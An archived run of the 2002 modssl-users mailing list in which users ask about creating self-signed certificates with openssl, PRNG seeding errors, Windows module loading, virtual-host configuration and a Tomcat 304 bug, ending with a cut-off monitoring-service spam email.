modssl-users-L id TAA03554; Tue, 15 Jan 2002 19:31:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mask.uits.indiana.edu id TAA03522; Tue, 15 Jan 2002 19:30:22 +0100 (MET) Received: from localhost (dial-116-58.dial.indiana.edu [156.56.116.58]) by mask.uits.indiana.edu (8.10.1/8.10.1/IUPO) with ESMTP id g0FIQAL03167; Tue, 15 Jan 2002 13:26:10 -0500 (EST) Date: Tue, 15 Jan 2002 13:29:45 -0500 Subject: Re: getting rid of Snake Oil stuff Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v480) Cc: obo@bourse.ch, dparis@w3works.com To: modssl-users@modssl.org From: Joe Auty In-Reply-To: <3C43E917.B3D4C0BB@bourse.ch> Message-Id: Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.480) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Auty X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users thanks for your help! It looks like I was on the right track before, with the exception of my httpd.conf file. A problem and a question.... The problem is that when I go to sign the csr, I get the following: 1 out of 1 certificate requests certified, commit? [y/n]y Write out database with 1 new entries Data Base Updated CA verifying: netmusician.crt <-> CA cert netmusician.crt: /C=US/ST=IN/L=Bloomington/O=Netmusician/CN=Netmusician/Email=joe@netmusician. org error 18 at 0 depth lookup:self signed certificate /C=US/ST=IN/L=Bloomington/O=Netmusician/CN=Netmusician/Email=joe@netmusician. org error 7 at 0 depth lookup:certificate signature failure I call upon the sign.sh script while in the path I was in as I went through the steps you included in your email (I can't get far otherwise). The question... once I've gotten netmusician.key and netmusician.crt after running the signing script, what do I do with these files? Where do they go? Thanks very much for your help! It's immensely appreciated!! > I think a few misunderstandings may have crept in... > > I assume you just want a certificate for your SSL site so that clients > can establish a secure connection - if so, you don't need the > SSLCACertificatePath or SSLCACertificateFile directives. They are for > when you want to authenticate *client's* certificates (i.e. if the > client needs a certificate to get into your site). All you need for a > public SSL site are SSLCertificateFile and SSLCertificateKeyFile. > > You still need to make a CA certificate but this is for your private use > to sign site certificates that you make - it never needs to be seen by > the web-server. In summary, the tasks are: > > - Make a CA certificate (ca.crt) > - make a site key (.key) > - make a site certificate signing request (.csr), using the .key > - sign the .csr to make a .crt > > These are the notes I use whenever I need to do this: > > 1) Create a RSA private key and certificate for our Certificate > Authority > > # openssl genrsa -des3 -out ca.key 1024 > password is "CA_PASSWORD" > Now make the certificate using the private key. > > # openssl req -new -x509 -days 365 -key ca.key -out ca.crt > > 2) Now make a Certificate Signing Request for www.kiwi.com > > # openssl genrsa -des3 -out kiwi.key 1024 > > This makes the key but it is password protected, which means you have > to type in a password to start the server. To avoid this, remove the PW > by writing out the key to a file and overwriting it. > > # openssl rsa -in kiwi.key -out temp > # mv temp kiwi.key > > Finally, make a CSR from the KEY. > > # openssl req -new -key kiwi.key -out kiwi.csr > > 4) And sign it > > # ./sign.sh kiwi.csr > > Now we have > > ca.crt Certificate Authority certificate > ca.db.certs ) CA databases, holding > ca.db.index ) details of certificates > ca.db.serial ) issued > ca.key Certificate Authority private key > sign.sh script for signing certificates > kiwi.crt www.kiwi.com certificate (sent with SSL requests) > kiwi.csr KIWI certificate signing request (not really needed anymore) > kiwi.key www.kiwi.com private key (decrypts public-key encoded > messages) > > - summary of commands > > # openssl genrsa -des3 -out www.kiwi.com.key 1024 > # openssl rsa -in www.kiwi.com.key -out temp > # mv temp www.kiwi.com.key > # openssl req -new -key www.kiwi.com.key -out www.kiwi.com.csr > # ./sign.sh www.kiwi.com.csr > > Rgds, > > Owen Boyle. > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 19:56:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA04389; Tue, 15 Jan 2002 19:55:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from snorkel.uits.indiana.edu id TAA04372; Tue, 15 Jan 2002 19:54:43 +0100 (MET) Received: from localhost (dial-116-58.dial.indiana.edu [156.56.116.58]) by snorkel.uits.indiana.edu (8.10.1/8.10.1/IUPO) with ESMTP id g0FIsT415885; Tue, 15 Jan 2002 13:54:29 -0500 (EST) Date: Tue, 15 Jan 2002 13:53:57 -0500 Subject: Re: getting rid of Snake Oil stuff Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v480) Cc: obo@bourse.ch, dparis@w3works.com To: modssl-users@modssl.org From: Joe Auty In-Reply-To: <3C43E917.B3D4C0BB@bourse.ch> Message-Id: <3B0B3862-09E9-11D6-9A98-000A27D817F2@netmusician.org> Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.480) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Auty X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Okay, it seems that after restarting apache without the CACertificate directives in there that sign.sh script now works without yielding the error I copied into my last email... I've got myself a netmusician.crt file... what do I do with it now to replace the dummy SnakeOil stuff? (I hope that you guys don't object to the CC) Looks like I'm almost there, at any rate.... cool. > I think a few misunderstandings may have crept in... > > I assume you just want a certificate for your SSL site so that clients > can establish a secure connection - if so, you don't need the > SSLCACertificatePath or SSLCACertificateFile directives. They are for > when you want to authenticate *client's* certificates (i.e. if the > client needs a certificate to get into your site). All you need for a > public SSL site are SSLCertificateFile and SSLCertificateKeyFile. > > You still need to make a CA certificate but this is for your private use > to sign site certificates that you make - it never needs to be seen by > the web-server. In summary, the tasks are: > > - Make a CA certificate (ca.crt) > - make a site key (.key) > - make a site certificate signing request (.csr), using the .key > - sign the .csr to make a .crt > > These are the notes I use whenever I need to do this: > > 1) Create a RSA private key and certificate for our Certificate > Authority > > # openssl genrsa -des3 -out ca.key 1024 > password is "CA_PASSWORD" > Now make the certificate using the private key. > > # openssl req -new -x509 -days 365 -key ca.key -out ca.crt > > 2) Now make a Certificate Signing Request for www.kiwi.com > > # openssl genrsa -des3 -out kiwi.key 1024 > > This makes the key but it is password protected, which means you have > to type in a password to start the server. To avoid this, remove the PW > by writing out the key to a file and overwriting it. > > # openssl rsa -in kiwi.key -out temp > # mv temp kiwi.key > > Finally, make a CSR from the KEY. > > # openssl req -new -key kiwi.key -out kiwi.csr > > 4) And sign it > > # ./sign.sh kiwi.csr > > Now we have > > ca.crt Certificate Authority certificate > ca.db.certs ) CA databases, holding > ca.db.index ) details of certificates > ca.db.serial ) issued > ca.key Certificate Authority private key > sign.sh script for signing certificates > kiwi.crt www.kiwi.com certificate (sent with SSL requests) > kiwi.csr KIWI certificate signing request (not really needed anymore) > kiwi.key www.kiwi.com private key (decrypts public-key encoded > messages) > > - summary of commands > > # openssl genrsa -des3 -out www.kiwi.com.key 1024 > # openssl rsa -in www.kiwi.com.key -out temp > # mv temp www.kiwi.com.key > # openssl req -new -key www.kiwi.com.key -out www.kiwi.com.csr > # ./sign.sh www.kiwi.com.csr > > Rgds, > > Owen Boyle. > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 10:05:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA14312; Wed, 16 Jan 2002 10:04:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id KAA14280; Wed, 16 Jan 2002 10:03:26 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA14402 for ; Wed, 16 Jan 2002 10:03:13 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma014379; Wed, 16 Jan 02 10:03:11 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA29516 for ; Wed, 16 Jan 2002 10:03:11 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA00299 for ; Wed, 16 Jan 2002 10:03:10 +0100 (MET) Message-ID: <3C4541CE.329BFE02@bourse.ch> Date: Wed, 16 Jan 2002 10:03:10 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: getting rid of Snake Oil stuff References: <3B0B3862-09E9-11D6-9A98-000A27D817F2@netmusician.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Joe Auty wrote: > > Okay, it seems that after restarting apache without the CACertificate > directives in there that sign.sh script now works without yielding the > error I copied into my last email... > > I've got myself a netmusician.crt file... what do I do with it now to > replace the dummy SnakeOil stuff? You put your new .crt and .key in the conf/ssl.crt and conf/ssl.key directories and change the names in the SSLCertificateFile and SSLCertificateKeyFile directives. Then you give the server a full restart ("graceful" won't reload certs). > (I hope that you guys don't object to the CC) Except that we get every mail twice... Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 12:45:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA22687; Wed, 16 Jan 2002 12:43:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id MAA22679; Wed, 16 Jan 2002 12:43:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tlvsdy.vim.tlt.alcatel.it id SAA12800; Mon, 14 Jan 2002 18:13:12 +0100 (MET) Received: from tlvhdk.netit.alcatel.it (tlvhgd.netit.alcatel.it [151.98.14.48]) by tlvsdy.vim.tlt.alcatel.it (8.9.3+Sun/8.9.3) with ESMTP id SAA12138 for ; Mon, 14 Jan 2002 18:14:23 +0100 (MET) Received: from netit.alcatel.it (tlvmee.vim.tlt.alcatel.it [151.98.40.213]) by tlvhdk.netit.alcatel.it (8.8.6 (PHNE_17135)/8.8.6) with ESMTP id SAA02548 for ; Mon, 14 Jan 2002 18:08:00 +0100 (MET) Message-ID: <3C4310F6.A163107D@netit.alcatel.it> Date: Mon, 14 Jan 2002 18:10:14 +0100 From: Marco Boccioli X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: GENRSA error!! Content-Type: multipart/alternative; boundary="------------87D35C3601064851F1F39E8A" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Marco Boccioli X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --------------87D35C3601064851F1F39E8A Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hi all, I would like to know why I have this type of error, during key generating... My action is: /opt/apache/ssl/bin/openssl genrsa -des3 -out vpn.key 1024 and I receive: warning, not much extra random data, consider using the -rand option Generating RSA private key, 1024 bit long modulus 23897:error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not seeded:md_rand.c:538: 23897:error:04069003:rsa routines:RSA_generate_key:BN lib:rsa_gen.c:182: Can you help me??? Thanks in advance, Marco. --------------87D35C3601064851F1F39E8A Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit  
Hi all,
I would like to know why I have this type of error, during key generating...
My action is:

/opt/apache/ssl/bin/openssl genrsa -des3 -out  vpn.key 1024

and I receive:

warning, not much extra random data, consider using the -rand option
Generating RSA private key, 1024 bit long modulus
23897:error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not seeded:md_rand.c:538:
23897:error:04069003:rsa routines:RSA_generate_key:BN lib:rsa_gen.c:182:

Can you help me???
Thanks in advance,
Marco. --------------87D35C3601064851F1F39E8A-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 12:45:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA22690; Wed, 16 Jan 2002 12:43:31 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id MAA22675; Wed, 16 Jan 2002 12:43:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from apollo63.magicalworks.com id QAA07259; Mon, 14 Jan 2002 16:58:34 +0100 (MET) Received: from workstationi (pD952A2B9.dip.t-dialin.net [217.82.162.185]) by apollo63.magicalworks.com (8.11.2/8.11.2/SuSE Linux 8.11.1-0.5) with SMTP id g0EFurG04631 for ; Mon, 14 Jan 2002 16:56:53 +0100 Message-ID: <003001c19d14$a4bbc380$ff78a8c0@workstationi> From: =?iso-8859-1?Q?=5B_Falk_Gro=DFwig_=5D?= To: Subject: Apache ModSSL 1.3.22 Date: Mon, 14 Jan 2002 17:00:35 +0100 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_002D_01C19D1C.FBF88D60" X-Priority: 1 X-MSMail-Priority: High X-Mailer: Microsoft Outlook Express 5.50.4522.1200 Disposition-Notification-To: =?iso-8859-1?Q?=5B_Falk_Gro=DFwig_=5D?= X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?iso-8859-1?Q?=5B_Falk_Gro=DFwig_=5D?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_002D_01C19D1C.FBF88D60 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello, i just get some errors if i try to load the Apache Modul ssl. I copied the 2 ddl's in the WINNT\SYSTEM32 and put the code in the = httpd.conf Now he told me he cant load the Apache Modul SSL into the Server ... Im using a XP Server with Apache 1.3.22 PHP 4.1.1 MySQL 4.00 and = ActivePerl. I hope i can find the answer here. Thanks for help=20 Grosswig ------=_NextPart_000_002D_01C19D1C.FBF88D60 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

Hello,
 
i just get some errors if i try to load = the Apache=20 Modul ssl.
 
I copied the 2 ddl's in the = WINNT\SYSTEM32 and put=20 the code in the httpd.conf
 
Now he told me he cant load the Apache = Modul SSL=20 into the Server ...
 
Im using a XP Server with Apache 1.3.22 = PHP 4.1.1=20 MySQL 4.00 and ActivePerl.
 
I hope i can find the answer = here.
 
Thanks for help
 
Grosswig
------=_NextPart_000_002D_01C19D1C.FBF88D60-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 12:45:40 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA22775; Wed, 16 Jan 2002 12:45:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id MAA22686; Wed, 16 Jan 2002 12:43:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from eos.hitc.com id WAA25474; Mon, 14 Jan 2002 22:18:08 +0100 (MET) Received: from eos.east.hitc.com (WSNT-NGREENWA.hitc.com [155.157.93.37]) by eos.hitc.com (8.11.3/8.11.3) with ESMTP id g0ELHWp15725 for ; Mon, 14 Jan 2002 16:17:33 -0500 (EST) Message-ID: <3C4349E3.84D36D92@eos.east.hitc.com> Date: Mon, 14 Jan 2002 16:13:07 -0500 From: Natisha Greenway X-Mailer: Mozilla 4.75 [en]C-CCK-MCD {Raytheon} (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Question Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Natisha Greenway X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I am a new user of modssl and several questions. I am trying to build modssl and would like to know once I got it installed how can I tell if it is properly installed or working? Is there some sort of compiler flag that I can implement? Natisha ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 12:45:43 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA22785; Wed, 16 Jan 2002 12:45:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id MAA22696; Wed, 16 Jan 2002 12:43:39 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from apollo63.magicalworks.com id AAA03006; Tue, 15 Jan 2002 00:37:22 +0100 (MET) Received: from workstationi (pD9E239D2.dip.t-dialin.net [217.226.57.210]) by apollo63.magicalworks.com (8.11.2/8.11.2/SuSE Linux 8.11.1-0.5) with SMTP id g0ENZe611957 for ; Tue, 15 Jan 2002 00:35:40 +0100 Message-ID: <003a01c19d54$bbb5c4b0$ff78a8c0@workstationi> From: =?iso-8859-1?Q?=5B_Falk_Gro=DFwig_=5D?= To: Subject: Apache modssl last release ... Date: Tue, 15 Jan 2002 00:39:16 +0100 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0035_01C19D5D.0FC8C5E0" X-Priority: 1 X-MSMail-Priority: High X-Mailer: Microsoft Outlook Express 5.50.4522.1200 Disposition-Notification-To: =?iso-8859-1?Q?=5B_Falk_Gro=DFwig_=5D?= X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?iso-8859-1?Q?=5B_Falk_Gro=DFwig_=5D?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0035_01C19D5D.0FC8C5E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello, i just installed the mod_ssl for Apache. First it workes fine, but i = cant tell how, the Apache shuts down the mod_ssl ... i cant reach the mod_ssl url if i open a new browser window. my config file loos so : .... .. ... LoadModule .... AddModule..... ..... ... .... BindAddress design-4-you.ath.cx ServerAdmin webmaster@design-4-you.org DocumentRoot E:/Server/www/ ServerName www.design-4-you.ath.cx ErrorLog E:/Server/logs/www.design-4-you.ath.cx-error_log CustomLog E:/Server/logs/www.design-4-you.ath.cx-access_log common ScriptAlias /cgi-bin/ E:/Server/www/cgi-bin/ AllowOverride All ServerAdmin webmaster@design-4-you.org DocumentRoot E:/Server/logs/ ServerName www.design-4-you.ath.cx ErrorLog E:/Server/logs/server.design-4-you.ath.cx-error_log CustomLog E:/Server/logs/server.design-4-you.ath.cx-access_log = common AllowOverride All ServerAdmin webmaster@design-4-you.org DocumentRoot E:/Server/phpmyadmin/ ServerName mysql.design-4-you.ath.cx ErrorLog E:/Server/logs/mysql.design-4-you.ath.cx-error_log CustomLog E:/Server/logs/mysql.design-4-you.ath.cx-access_log common AllowOverride All #SSLMutex sem SSLRandomSeed startup builtin SSLSessionCache dbm:C:/Apache/logs/ssl_gcache_data SSLSessionCacheTimeout 600 SSLProtocol all #SSLVerifyClient require SSLVerifyDepth 10 #SSLOptions +FakeBasicAuth -StrictRequire SSLLog logs/SSL.log SSLLogLevel warn ServerAdmin webmaster@design-4-you.org ServerName design-4-you DocumentRoot E:/Server/secure/ ErrorLog E:/Server/logs/secure.design-4-you.ath.cx-error_log CustomLog E:/Server/logs/secure.design-4-you.ath.cx-access_log common SSLEngine On SSLCertificateFile conf/ssl/www.design-4-you.ath.cx.cert SSLCertificateKeyFile conf/ssl/www.design-4-you.ath.cx.key -------------------------------------------------------------------------= --------------------------------------------------------- by the way, im using windows 2000 professional=20 Apache/1.3.22 (Win32) mod_ssl/2.8.5 OpenSSL/0.9.6b PHP/4.1.1 I hope u can help me ... mybe tell me how the order should be in the httpd.conf that mod_ssl = works correct ... ------=_NextPart_000_0035_01C19D5D.0FC8C5E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hello,
 
i just installed the mod_ssl for = Apache. First it=20 workes fine, but i cant tell how, the Apache shuts down the mod_ssl=20 ...
 
i cant reach the mod_ssl url if i open = a new=20 browser window.
 
my config file loos so :
 
....
..
...
 
 
LoadModule ....
AddModule.....
 
.....
...
....

BindAddress design-4-you.ath.cx
 
<VirtualHost www.design-4-you.ath.cx>   =20 ServerAdmin webmaster@design-4-you.org=
   =20 DocumentRoot E:/Server/www/
    ServerName www.design-4-you.ath.cx
&n= bsp;  =20 ErrorLog = E:/Server/logs/www.design-4-you.ath.cx-error_log
   =20 CustomLog E:/Server/logs/www.design-4-you.ath.cx-access_log=20 common
    ScriptAlias /cgi-bin/=20 E:/Server/www/cgi-bin/
<Directory = E:/Server/www/>
   =20 AllowOverride All
</Directory>
</VirtualHost>
 
<VirtualHost = server.design-4-you.ath.cx>
   =20 ServerAdmin webmaster@design-4-you.org=
   =20 DocumentRoot E:/Server/logs/
    ServerName www.design-4-you.ath.cx
&n= bsp;  =20 ErrorLog=20 E:/Server/logs/server.design-4-you.ath.cx-error_log
   = =20 CustomLog E:/Server/logs/server.design-4-you.ath.cx-access_log=20 common
<Directory E:/Server/logs/>
    = AllowOverride=20 All
</Directory>
</VirtualHost>
 
<VirtualHost mysql.design-4-you.ath.cx>
    = ServerAdmin webmaster@design-4-you.org=
   =20 DocumentRoot E:/Server/phpmyadmin/
    ServerName=20 mysql.design-4-you.ath.cx
    ErrorLog=20 E:/Server/logs/mysql.design-4-you.ath.cx-error_log
    = CustomLog E:/Server/logs/mysql.design-4-you.ath.cx-access_log=20 common
<Directory E:/Server/phpmyadmin/>
   =20 AllowOverride All
</Directory>
</VirtualHost>
 

#SSLMutex sem
SSLRandomSeed startup = builtin
SSLSessionCache=20 dbm:C:/Apache/logs/ssl_gcache_data
SSLSessionCacheTimeout = 600
SSLProtocol=20 all
#SSLVerifyClient require
SSLVerifyDepth 10
 
#SSLOptions +FakeBasicAuth -StrictRequire
 

SSLLog logs/SSL.log
SSLLogLevel warn
 
<VirtualHost ssl.design-4-you.ath.cx>
ServerAdmin webmaster@design-4-you.org=
ServerName=20 design-4-you
DocumentRoot E:/Server/secure/
ErrorLog=20 E:/Server/logs/secure.design-4-you.ath.cx-error_log
CustomLog=20 E:/Server/logs/secure.design-4-you.ath.cx-access_log common
SSLEngine = On
SSLCertificateFile=20 conf/ssl/www.design-4-you.ath.cx.cert
SSLCertificateKeyFile=20 conf/ssl/www.design-4-you.ath.cx.key
</VirtualHost>
 
--------------------------------------------------------------------= --------------------------------------------------------------
 
by the way, im using windows 2000 professional
 
Apache/1.3.22 (Win32) mod_ssl/2.8.5 OpenSSL/0.9.6b PHP/4.1.1
 
I hope u can help me ...
 
mybe tell me how the order should be in the httpd.conf that mod_ssl = works=20 correct ...
------=_NextPart_000_0035_01C19D5D.0FC8C5E0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 12:46:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA22804; Wed, 16 Jan 2002 12:45:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id MAA22741; Wed, 16 Jan 2002 12:44:58 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id AAA18365; Wed, 16 Jan 2002 00:21:19 +0100 (MET) Date: Wed, 16 Jan 2002 00:21:19 +0100 (MET) Message-Id: <200201152321.AAA18365@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] apache/tomcat/mod_ssl 304 error (PR#660) CC: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Version: 2.8.5 OS: Solaris 2.8 Submission from: (NULL) (199.46.199.231) Configured the mod_ssl with ./configure \ "--with-apache=../apache_1.3.22" \ "--with-ssl=/usr/local/ssl" \ "--prefix=/usr/local/apache" \ "--enable-shared=ssl" \ "--enable-module=most" \ "--enable-shared=max" \ "--enable-rule=SSL_SDBM" \ "--with-crt=/usr/local/ssl/misc/WebServer/server.crt" \ "--with-key=/usr/local/ssl/misc/WebServer/server.key" \ I also created and installed mod_jk (part of tomcat) after making and installing apache with mod_ssl. I am running tomcat 3.3a. ...since version 4.0 does not support load balancing... reloading the http://hostname/examples/jsp/index.html page periodically will give a strange result. The top part of the page contains the results header from the previous request. This seems to only occur with Netscape 4.7x and not IE 5.x The following is the page when the problem occurs. Error: 304 Location: /examples/jsp/index.html HTTP/1.1 304 Not Modified Date: Tue, 15 Jan 2002 22:55:08 GMT Server: Apache/1.3.22 (Unix) mod_jk/1.1.0 mod_ssl/2.8.5 OpenSSL/0.9.6b Content-Length: 121 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html Error: 304 Location: /examples/jsp/index.html I have been able to determine that the error does not occur with non-tomcat pages with "./apachectl startssl" and also does not occur at all with "./apachectl start" (instead of startssl). Even tomcat works without the mod_ssl enabled. It seems that the combination of using tomcat and mod_ssl have created a unique condition on 304 errors. If you hold the shift down, the problems disappears since there are only 200 error codes returned. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 12:46:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA22812; Wed, 16 Jan 2002 12:45:39 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id MAA22737; Wed, 16 Jan 2002 12:44:47 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from internetseer.com id UAA06519; Tue, 15 Jan 2002 20:35:04 +0100 (MET) Received: (qmail 19148 invoked from network); 15 Jan 2002 19:27:10 -0000 Received: from pm58.internetseer.net (HELO pm68) (66.150.40.68) by 66.150.40.20 with SMTP; 15 Jan 2002 19:27:10 -0000 Message-ID: <5611013.1011123248723.JavaMail.promon@pm68> Date: Tue, 15 Jan 2002 14:34:08 -0500 (EST) From: Cindy Jordan To: modssl-users@modssl.org Subject: Broken link on your website Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4251_389143.1011123248723" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cindy Jordan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ------=_Part_4251_389143.1011123248723 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable I noticed that your page: http://www.modssl.org/docs/2.8/ssl_faq.html=20 contained a link to: http://www.wassenaar.org/. The page at http://www.wassenaar.org/ cannot currently be accessed because = of the following=20 error: Time Out.=A0 We last examined your page on 08-28-2001. If your page has not=20 been updated since 08-28-2001, your link is most likely currently=20 broken. No one likes broken links on their website so we thought you=92d li= ke to=20 be the first to know. WHO ARE WE? We=92re Internetseer.com, the worlds largest FREE website monitoring servic= e.=20 One recent subscriber wrote the following; =93You did an awesome job=20 identifying to me that our site went down and tracking it until it came bac= k=20 up again=94. HOW CAN OUR SERVICE BE FREE? Our service is supported by advertisers and subscribers who purchase=20 additional services, but our basic service is FREE. Activating a free website monitoring account could not be easier. Click her= e=20 for auto sign-up: http://scclick.internetseer.com/sitecheck/clickthrough.js= p?I5s57d5l5j5h5h5l5d53M5pHww0t0xWS5aUzRPz5tNIVWzC5dIzL52W5sMPTN5n5e5bUKT5bK= 6txWVI_6tz5dIzL5b53T5p5g=3De3 WHAT DO YOU GET FOR FREE? We=92ll monitor your site once every hour, 24 hours a day, seven days a wee= k for=20 free. You can even have multiple people notified when we detect an error. I= n=20 addition, you=92ll receive a website performance report every week showing= =20 uptime percentages, average connect times, helpful links to others sites an= d=20 of course promotions from our advertisers. You can cancel your free=20 subscription at any time. This message is not spam because we are not trying to sell you a service. W= e=20 are simply advising you that a link on your website is currently broken due= to=20 the error listed above. If you would like to subscribe to our free website monitoring service, plea= se=20 click on the following link: http://scclick.internetseer.com/sitecheck/clickthrough.jsp?I5s57d5l5j5h5h5l= 5d53M5pHwPp30xWS5aUzRPz5tNIVWzC5dIzL52W5sMPTN5n5e5bUKT5bNIVWzC5dIzL5bVw6vx5= e5e5b5n5bxWS6sX6tw5dMPNS53T5p5e=3De3 If you do not wish to receive any further email messages from us, please 